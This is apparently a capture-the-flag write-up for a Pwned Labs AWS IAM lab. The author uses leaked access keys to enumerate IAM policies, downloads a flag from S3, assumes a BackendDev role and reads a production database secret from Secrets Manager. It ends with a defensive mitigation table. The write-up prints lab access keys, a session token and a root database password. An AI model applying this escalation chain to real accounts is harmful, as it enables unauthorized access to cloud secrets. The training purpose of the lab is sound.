Pwned Labs: Intro to AWS IAM Enumeration
Contents
Enumeration
Initial Access – AWS Credentials
Access key ID: AKIA3SFMDAPOWC2NR5LO
Secret access key : +hCgg8uYwGeedSpfARQyGFkr9fdVhnrObshtrHq3Verify Access
└──╼ $aws sts get-caller-identity --profile iam_user
{
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/dev01"
}IAM Policy Enumeration
List Attached Managed Policies
└──╼ $aws iam list-attached-user-policies --user-name dev01 --profile iam_user
{
"AttachedPolicies": [
{
"PolicyName": "AmazonGuardDutyReadOnlyAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
},
{
"PolicyName": "dev01",
"PolicyArn": "arn:aws:iam::794929857501:policy/dev01"
}
]
}- Attached Policies found:
AmazonGuardDutyReadOnlyAccessdev01 (custom managed policy)
List Inline Policies
└──╼ $aws iam list-user-policies --user-name dev01 --profile iam_user
{
"PolicyNames": [
"S3_Access"
]
}- Inline Policy Found:
S3_Access
View Inline Policy: S3_Access
└──╼ $aws iam get-user-policy --policy-name S3_Access --user-name dev01 --profile iam_user
{
"UserName": "dev01",
"PolicyName": "S3_Access",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::hl-dev-artifacts",
"arn:aws:s3:::hl-dev-artifacts/*"
]
}
]
}
}- Dev01 has access to s3 bucket called hl-dev-artifacts
S3 Bucket Enumeration
└──╼ $aws s3 ls s3://hl-dev-artifacts --profile iam_user
2023-10-01 16:39:53 1235 android-kotlin-extensions-tooling-232.9921.47.pom
2023-10-01 16:39:53 214036 android-project-system-gradle-models-232.9921.47-sources.jar
2023-10-01 16:38:05 32 flag.txt- Found this user has access several documents and flag is found lets try to download the flag
Retrieve the Flag
└──╼ $aws s3 cp s3://hl-dev-artifacts/flag.txt . --profile iam_user
download: s3://hl-dev-artifacts/flag.txt to ./flag.txt
└──╼ $cat flag.txt
Redactedc904551935c7514- Flag: Redacted8545df0c904551935c7514`
We’re not done yet—time to dig into the managed policies and see what else we can uncover
Get Policy Version’s
Custom Managed Policy: dev01
└──╼ $aws iam get-policy --policy-arn arn:aws:iam::794929857501:policy/dev01 --profile iam_user
{
"Policy": {
"PolicyName": "dev01",
"PolicyId": "ANPA3SFMDAPOZWBBGZD4I",
"Arn": "arn:aws:iam::794929857501:policy/dev01",
"Path": "/",
"DefaultVersionId": "v7",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "dev01 policy",
"CreateDate": "2023-10-01T20:29:16+00:00",
"UpdateDate": "2023-10-11T19:59:08+00:00",
"Tags": []
}
}- Version:v7
AmazonGuardDutyReadOnlyAccess
└──╼ $aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess --profile iam_user
{
"Policy": {
"PolicyName": "AmazonGuardDutyReadOnlyAccess",
"PolicyId": "ANPAIVMCEDV336RWUSNHG",
"Arn": "arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess",
"Path": "/",
"DefaultVersionId": "v4",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Provides read only access to Amazon GuardDuty resources",
"CreateDate": "2017-11-28T22:29:40+00:00",
"UpdateDate": "2023-11-16T23:07:06+00:00",
"Tags": []
}
}- Version:v4
Found Dev01 Managed Policy Permissions
──╼ $aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/dev01 --version-id v7 --profile iam_user
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"iam:GetRole",
"iam:GetPolicyVersion",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetUserPolicy",
"iam:ListGroupsForUser",
"iam:ListAttachedUserPolicies",
"iam:ListUserPolicies",
"iam:GetUser",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Resource": [
"arn:aws:iam::794929857501:user/dev01",
"arn:aws:iam::794929857501:role/BackendDev",
"arn:aws:iam::794929857501:policy/BackendDevPolicy",
"arn:aws:iam::794929857501:policy/dev01",
"arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess"
]
}
]
},
"VersionId": "v7",
"IsDefaultVersion": true,
"CreateDate": "2023-10-11T19:59:08+00:00"
}
}- The policy allows
dev01to query IAM metadata for certain resources includingBackendDevrole and policies.
└──╼ $aws iam get-policy-version --policy-arn arn:aws:iam::aws:policy/AmazonGuardDutyReadOnlyAccess --version-id v4 --profile iam_user
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"guardduty:Describe*",
"guardduty:Get*",
"guardduty:List*"
],
"Resource": "*"
},
{
"Effect": "Allow",
"Action": [
"organizations:ListDelegatedAdministrators",
"organizations:ListAWSServiceAccessForOrganization",
"organizations:DescribeOrganizationalUnit",
"organizations:DescribeAccount",
"organizations:DescribeOrganization",
"organizations:ListAccounts"
],
"Resource": "*"
}
]
},
"VersionId": "v4",
"IsDefaultVersion": true,
"CreateDate": "2023-11-16T23:07:06+00:00"
}
}Enumerating IAM Role: BackendDev
└──╼ $aws iam get-role --role-name BackendDev --profile iam_user
{
"Role": {
"Path": "/",
"RoleName": "BackendDev",
"RoleId": "AROA3SFMDAPO2RZ36QVN6",
"Arn": "arn:aws:iam::794929857501:role/BackendDev",
"CreateDate": "2023-09-29T12:30:29+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::794929857501:user/dev01"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Grant permissions to backend developers",
"MaxSessionDuration": 3600,
"RoleLastUsed": {
"LastUsedDate": "2025-06-22T04:12:49+00:00",
"Region": "us-east-1"
}
}dev01is explicitly allowed to assume theBackendDevrole.
Check BackendDev Policy Permissions
──╼ $aws iam get-policy --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy --profile iam_user
{
"Policy": {
"PolicyName": "BackendDevPolicy",
"PolicyId": "ANPA3SFMDAPO7OINIQIRR",
"Arn": "arn:aws:iam::794929857501:policy/BackendDevPolicy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"Description": "Policy defining permissions for backend developers",
"CreateDate": "2023-09-29T12:44:09+00:00",
"UpdateDate": "2023-09-29T12:44:09+00:00",
"Tags": []
}
}- Got the version id : v1
List the BackendDev policy permission’s
└──╼ $aws iam get-policy-version --policy-arn arn:aws:iam::794929857501:policy/BackendDevPolicy --version-id v1 --profile iam_user
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"ec2:DescribeInstances",
"secretsmanager:ListSecrets"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"secretsmanager:GetSecretValue",
"secretsmanager:DescribeSecret"
],
"Resource": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf"
}
]
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2023-09-29T12:44:09+00:00"
}
}- Permissions:
ec2:DescribeInstancessecretsmanager:ListSecretssecretsmanager:GetSecretValue(on specific secret)
Privilege Escalation
Assume Role as BackendDev
└──╼ $aws sts assume-role --role-arn arn:aws:iam::794929857501:role/BackendDev --role-session-name BackendDev --profile iam_user
{
"Credentials": {
"AccessKeyId": "ASIA3SFMDAPO3OSDWH7T",
"SecretAccessKey": "i2HLHHfZuWPSp+PeRKy7AJBiDwEIawlaUyYjfUhP",
"SessionToken": "IQoJb3JpZ2luX2VjEBoaCXVzLWVhc3QtMSJHMEUCIQDf4w37uTzI1X9T7PT6IPZkTKeB8kgiTYHXjuWixwFJlgIgGF2pZ8Dys3jQX3nPac2DoI1fokw57dXMzCSf1/3lwigqlwIIExAAGgw3OTQ5Mjk4NTc1MDEiDKv43kLOC4CzLDZbair0AYsqaF//oWx20OAXxRPsu5U/4lbY25atz2jy6abaMD5Xul2cwnJAw5pOtfb0ZipMjQNAHs3Fhe721JEXlrBLJseTg1l2fTizkvASXrGHQcIaEObXygS1sfSQ6TTimCub99BApZO1HZTQa0UbdZi92TWg02vysE8KDsT8PIWe0G3DOaZd/Vwr0iDtl18xiO1+KURsZw9fDBEMbqDPvMQVUQeTO9wXtZH0BP4i7ZlYb67Se/nQvjKwOGmZ9bFRdYK0FELgLJOh6oheTuKHKnURzYNcqsIi5yI7m8CbzyQBUcXz6Ul/qRKXpMbzBM79+uxk6oFbIcswmb/kwgY6nQESrADwZjFtJ37ZCRQzv0NqBPPsx8XA3dGAdV8qisl3GYKaGofKAuwYCMBwt0Ikw5V7/tec9rrnUJ0oCH8S5RypjTkLwN/cf4KYSpFlh8sp6x5SqWbiztjW6SUnbbgCQ0fhWN656qSvdIW8zNQXEKQlSr3029Gd5ZJIBS4p0oKxjlG7dFJRvvePot+7U0EdT8j3JL2ZdtksOtNbhqia",
"Expiration": "2025-06-23T10:34:17+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROA3SFMDAPO2RZ36QVN6:BackendDev",
"Arn": "arn:aws:sts::794929857501:assumed-role/BackendDev/BackendDev"
}
}Set Credentials:
Manually update~/.aws/credentialswith the returnedAccessKeyId,SecretAccessKey, andSessionTokenunder a new profile (BackendDev).
Verify Access as Assumed Role
└──╼ $aws sts get-caller-identity --profile iam_user
{
"UserId": "AIDA3SFMDAPOWFB7BSGME",
"Account": "794929857501",
"Arn": "arn:aws:iam::794929857501:user/dev01"
}Access AWS Secrets Manager
List Secrets
└──╼ $aws secretsmanager list-secrets --profile BackendDev
{
"SecretList": [
{
"ARN": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf",
"Name": "prod/Customers",
"Description": "Access to the MySQL prod database containing customer data",
"LastChangedDate": "2023-09-29T08:37:58.584000-04:00",
"LastAccessedDate": "2025-06-22T20:00:00-04:00",
"Tags": [],
"SecretVersionsToStages": {
"bf175f57-7e29-4fd1-881f-76e78fdd7320": [
"AWSCURRENT"
]
},
"CreatedDate": "2023-09-29T08:37:58.328000-04:00"
}
]
}- Got the secret id: prod/Customers
View the Secret
└──╼ $aws secretsmanager get-secret-value --secret-id prod/Customers --profile BackendDev
{
"ARN": "arn:aws:secretsmanager:us-east-1:794929857501:secret:prod/Customers-QUhpZf",
"Name": "prod/Customers",
"VersionId": "bf175f57-7e29-4fd1-881f-76e78fdd7320",
"SecretString": "{\"username\":\"root\",\"password\":\"$DB$Admin12345\",\"engine\":\"mariadb\",\"host\":\"10.10.14.15\",\"port\":\"3306\",\"dbname\":\"customers\"}",
"VersionStages": [
"AWSCURRENT"
],
"CreatedDate": "2023-09-29T08:37:58.579000-04:00"
}Secrets Reveled:
{
"username": "root",
"password": "$DB$Admin12345",
"engine": "mariadb",
"host": "10.10.14.15",
"port": "3306",
"dbname": "customers"
}Defending AWS IAM: Findings and Mitigations
| # | Area | Observation | Risk / Impact | Recommendation |
|---|---|---|---|---|
| 1 | IAM User Details | dev01 is an active IAM user with programmatic access (access keys). |
May indicate credential leakage if keys are hardcoded or exposed. | Rotate keys immediately. Enforce temporary credentials via IAM roles. |
| 2 | Attached Policies | User has managed policies and possibly custom inline policies. | Policies may grant broad access if not scoped properly. | Review policies. Remove unused or overly permissive permissions. |
| 3 | Group Membership | dev01 is part of a group with shared permissions. |
Group policies may escalate dev01’s access scope indirectly. |
Review and minimize group permissions. |
| 4 | AssumeRole Permissions | dev01 can assume the BackendDev role via sts:AssumeRole. |
Risk of privilege escalation if the target role has higher privileges. | Restrict trust policies. Add condition-based controls (e.g., source ARN/IP). |
| 5 | Secrets Manager Access | Through the BackendDev role, dev01 can read sensitive secrets like prod/Customers. |
Secret data exposure (e.g., credentials, tokens). | Use resource-based policies. Enable KMS, rotation, and contextual access. |
| 6 | S3 Access | Inline policies grant s3:GetObject permissions to hl-dev-artifacts bucket. |
Unauthorized file access; potential data exfiltration. | Restrict S3 bucket policies. Use Access Analyzer to review exposure. |